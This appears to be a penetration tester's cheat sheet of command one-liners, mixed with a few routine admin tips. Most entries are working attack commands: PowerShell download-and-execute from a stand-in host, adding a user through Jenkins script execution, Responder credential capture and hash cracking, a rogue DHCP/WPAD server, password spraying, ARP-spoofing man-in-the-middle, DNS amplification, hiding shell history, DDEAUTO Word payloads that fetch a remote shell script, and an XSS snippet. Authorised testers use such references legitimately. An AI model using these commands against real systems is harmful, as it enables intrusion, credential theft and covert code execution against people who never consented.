Poor-man’s ping sweep on Windows:
for /L %A in (1,1,5) do (for /L %B in (0,1,5) do (for /L %C in (0,1,5) do (for /L %D in (0,1,5) do ping -n 1 %A.%B.%C.%D))) >> output.txt
Replace the 5’s with your desired range for each octet.
Find the domain controller in your local network:
nslookup set type=all _ldap._tcp.dc._msdcs.DOMAIN_Name
Replace DOMAIN_NAME with actual domain, available through systeminfo
Jenkins script execution:
def command = """net user YOUNEWUSER YOURNEWPASSWORD /ADD""" def proc = command.execute() proc.waitFor() println "stdout: ${proc.in.text}" Run Result
Download and execute via PowerShell:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.4:8000/SomeScript.ps1');Invoke-SomeMethod -SomeParameter SomeValue"
Generate all numbers from zero to 200 with equal widht (leading zeroes):
seq -w 0 1 200
Generating usernames when convention is known:
echo -e {a..z}{A..Z}{0..9}| sed 's/ /\r\n/g'
Post-exploitation activities in order of noisiness:
- Responder when on a busy network
-
sudo python Responder.py -i 1.2.3.4 -I eth0 -rdfw
- Crack hashes
- john Responder/logs/SMB-NTLMv2-SSP-1.2.3.4.txt –wordlist=BigPasswordList –rules
- hashcat64.exe –remove -a 0 -m 5500 -o Cracked.txt hashes.txt Passwords.txt -r d3adhob0.rule.txt
- Crack hashes
-
- Rogue DHCP server on the network (from the Responder package)
-
sudo python DHCP.py -I eth0 -r GATEWAYIP -p ATTACKERIP -s 127.0.1.1 -n 255.SUB.NET.MASK -d "DOMAIN_NAME" -w "http://ATTACKERIP/wpad.dat"
-
- CrackMapExec for local admin account with weak default password
-
sudo cme smb smb-targets -u Administrator -p password --local-auth
-
- CrackMapExec when username convention is known
-
sudo cme smb smb-targets -u usersinfile -p defaultpassword
-
- Grab the frontpage of common web application ports
-
while read line ; do wget http://$line:80 --no-check-certificate -T 5 -t 2 -O frontpages/$line.html -o logfile.txt ; done < 1.2.3.4-masscan-port-80-ips
-
while read line ; do wget http://$line:443 --no-check-certificate -T 5 -t 2 -O frontpages/$line-443.html -o logfile.txt ; done < 1.2.3.4-masscan-port-443-ips
-
while read line ; do wget http://$line:8080 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8080.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8080-ips
-
while read line ; do wget http://$line:7001 --no-check-certificate -T 5 -t 2 -O frontpages/$line-7001.html -o logfile.txt ; done < 1.2.3.4-masscan-port-7001-ips
-
while read line ; do wget http://$line:8085 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8085.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8085-ips
-
while read line ; do wget http://$line:8090 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8090.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8090-ips
-
while read line ; do wget http://$line:8081 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8081.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8081-ips
-
- Masscan of select ports
-
masscan -p 0-65535 1.2.3.4/24 --rate=40000 -oG 1.2.3.4-masscan-port-all
-
Get most commonly occurring ports on the network after a full masscan:
cat 1.2.3.4-masscan-port-all |awk '{print $3}' | sort | uniq -c | sort -n > top-ports
Decompile JNLP applications:
-
Download the JNLP file, open it up, copy all JAR-file URLs into a file
-
Run through the file and download all the JARs
-
touch jars && ls | grep .jar > jars && while read line; do unzip $line -d $line-unpacked; done < jars
-
Decompile the JARs with your favorite tool
Man-In-The-Middle without GUI tools:
-
sudo apt-get install dsniff
-
sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>
-
All traffic will now end up on your computer. To automatically forward said traffic, run the following command: sudo sysctl net.ipv4.conf.all.forwarding=1
-
Traffic is now being forwarded. To see if you already have this enabled, run this: sysctl -a | grep forward
-
To disable it, just set forwarding=0
-
Now you can run Wireshark or tcpdump and sniff the traffic.
Man-In-The-Middle’ing web applications:
So you’ve successfully MITM’ed a host on the network. Now you can do all sorts of stuff and intercept traffic and files and what-not, but how about not just intercepting it, but altering it? More precisely, let’s say you want to intercept and alter every request made to a website? This can be done with some iptables magic and the Burp proxy. On a linux box, execute the following: iptables -F -t nat iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j DNAT –to 192.168.0.5:8080 This will make everything that is received on eth0 heading for port 443, pass through the proxy you have listening on port 8080 on the IP 192.168.0.5:8080 When you’re done, in my experience it’s easier to just clear the iptables and re-run you usual setup script, rather than extracting the lines you’ve just inputted.
Get linecount for code review estimation:
find $(pwd) -iname *.java > files.txt && while read line ; do wc -l $line ; done < files.txt > counts.txt && rm files.txt && cat counts.txt | cut -d” ” -f1 > numbers.txt && rm counts.txt && sum=0 ; while read num ; do sum=$(($sum + $num)) ; done < numbers.txt ; echo $sum && rm numbers.txt
Diffing files and folders:
diff <folder1> <folder2> -E -b -B -r -q This will list all the files that differ diff <folder1> <folder2> -E -b -B -r This will show the actual differences
DNS cache snooping:
dig @<dns-server-ip> <domain-to-lookup> A (regular lookup) dig @<dns_server_ip> <domain_to_lookup> A +norecurse (cached lookup)
Split string on delimiters:
cut -d ‘:’ -f 2 twitter.txt This will split on the : character and remove it and the left-hand side of the string. -f 1 will remove the delimiter and the right-hand side
How to tar certain filetypes recursively
ls -R | egrep ‘.*.exe$’ > all_exe_files.txt tar -cf tar.tar first_exe_filefrom_list.exe while read line; do tar -rvf tar.tar $line; done < all_exe_files.txt
Verify if SSL session caching is enabled
openssl s_client -connect <ip:port> -reconnect if the session IDs are the same, it’s enabled.
Verify if HTTP DEBUG is enabled in a oneliner
echo -e “DEBUG /page.aspx HTTP/1.0\r\nCommand: stop-debug\r\n\r\n” | openssl s_client -connect <ip>:<port> -quiet if it returns 200 OK, it’s enabled
How to verify weak IPSec settings
ike-scan <ip> –trans=”(1=x, 2=y, 3=z, 4=w)” where x=encryption algorithm, y=hash, z=auth, w=DH group. see nta-monitor.com/wiki
DNS amplification DoS
dig . NS @<ip>
How to verify if TRACE is enabled
telnet to the server.
TRACE /HTTP/1.0
XST: <some number>
TC: <some number>
<enter>
Show iptables rules and policies
iptables -L -n –line-numbers
Kill process in Windows running under admin-user
runas /user:<domain>\<username> cmd wmic process delete where name=”process.exe”
Linux get filesize
du <folder> -hc | grep total
Allow local user access via SSH
nano /etc/ssh/sshd_config find the line “DenyUsers <username>” and put an # in front of it. restart sshd
Hide shell history
unset HISTFILE
How to run commands as admin on Windows
go to a commandprompt at type in: runas /user:[DOMAIN]\[USER] [COMMAND]
Reconnecting a client to WSUS
wuauclt /resetauthorization /detectnow
Force update of GPO
gpupdate /force
Grepping through everything
grep -rail - recursive, treat everything is text, case insensitive, output files with matches
Convert epoch to human format:
cat acccess.log | awk '{$1=strftime("%F %T", $1, 1); print$0}' Example: date +%s | awk '{$1=strftime("%F %T", $1, 1); print $0}'
DDE macro-less exploitation:
In word, press ctrl+F9 to insert a field. Right click and enable field codes. Enter the following code:
DDEAUTO “APPLICATION_NAME” ” \\..\\Windows\\ABCDEFGHIJKLMNOPQRSTUVXYZ\\..\\System32\\calc.exe” “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABC”
APPLICATION_NAME is the name of the application that Word will ask you if you want to start
ABCDEFGHJ… is the remote data that Word will tell you is inaccessible. If you don’t use all charecters, you need to pad with \\..’es
System32\\calc.exe is of course the payload.
AAAAAAAAAAA is the error explanation shown when your payload executes. The less you pad before ABCDEFG the more characters you have for this message
The more you pad, the less room there is for you payload. This is my goto DDEAUTO, without any attempt at hidding it:
DDEAUTO c:\\Windows\\System32\\cmd.exe “/k powershell.exe -NoP -sta -NonI -w Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://mydomain/shell.ps1’);powershell $e
Using XSS to replace content:
<script>document.getElementsByTagName(“h2″)[2].innerHTML=”your content”; document.getElementsByTagName(“h1″)[0].innerHTML=”other stuff”;</script>
Replaces the 2nd H2 tag content and the first H1 content.